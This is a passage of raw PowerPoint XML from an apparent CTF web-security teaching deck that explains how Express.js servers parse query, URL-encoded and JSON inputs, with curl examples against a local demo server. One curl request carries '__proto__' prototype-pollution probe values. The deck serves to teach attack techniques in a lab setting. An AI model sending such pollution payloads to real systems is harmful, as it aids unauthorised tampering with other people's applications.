              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Some uncommon, specific techniques will also be discussed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>To better understand them, we will run some examples together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-298450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="92278F"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Lato"/>
              <a:buChar char="○"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>If you have not prepared the runtimes and downloaded the files, get ready now</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FEB9838-0D3D-AF0B-B38D-B63240693A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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5550069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34FAB-6705-C80A-E028-0F6494C657CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Inputting objects</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C4F9C27-06D8-BCC3-26CA-D5C2515189BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Basic web techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>You should almost always use curl, Python, Postman, etc. instead of your browser and the challenge’s webpage to send requests to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Can change every HTTP request headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>The webpage likely restricts or messes with your payload before sending the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Example: The webpage of UTCTF 2024/Easy Mergers quotes your payload [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Can easily automate if a lot of requests are needed</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97911026-A93F-05B2-A92D-0653880B25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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A5C7AE9-C6D3-425E-DE80-167E91A35AED}"/>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https://ctftime.org/writeup/38994</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2340616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2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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For JavaScript, the server is most likely using Express.js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Most higher-level frameworks are built on top of Express.js internally, e.g. Nest.js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>There are 3 main ways to input objects from requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Query parameters: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>?key=value&amp;key2=value2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>POST with URL-encoded payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>POST with JSON payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>POST with JSON payload is the most likely one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>For the following examples, go to the downloaded files and run “node ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>inputting_objects.mjs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>” in a terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>After running the above command, navigate to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> in your browser and you should see “Hello, world!”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Launch another terminal for using “curl”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>If you are wondering about the “curl” options used later, please consult the manual: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://curl.se/docs/manpage.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1628368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3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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Before we demonstrate the examples, let’s explain the code a bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>There are 5 URLs available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>: Sanity check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/query"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>: Query parameters, support nested objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/body-parser/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>: JSON payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/body-parser/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>: URL encoded payload, support nested objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/body-parser/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unextended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>: URL encoded payload, does not support nested objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The code itself also has comments that supplement the content, you are recommended to read them</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2602043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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/query"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -X GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"http://localhost/query?key=value&amp;nested[key]=value&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__=test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>test[__proto__]=test</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–g</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HTTP/1.1 200 OK</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X-Powered-By: Express</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Content-Type: application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; charset=utf-8</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Content-Length: 75</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ETag: W/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"4b-zOzc2f3guXg/U2PDf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rAyaIGwUA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>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Date: Sun, 05 May 2024 07:25:22 GMT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Connection: keep-alive</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Keep-Alive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: timeout=5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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"query"</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key"</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"value"</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"nested</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key"</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"value</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"test"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highligh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:"[object Object]"}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Query parameters are in the format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>key=value</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Nested properties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nested[key]=value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> are allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Consult </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0" err="1"/>
              <a:t>qs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> documentation for more syntax: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/ljharb/qs#readme</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Unfortunately, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> are ignored</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1287671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400" dirty="0"/>
              <a:t>Inputting objects: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/body-parser/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="24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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -X POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"http://localhost/body-parser/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlencoded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application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
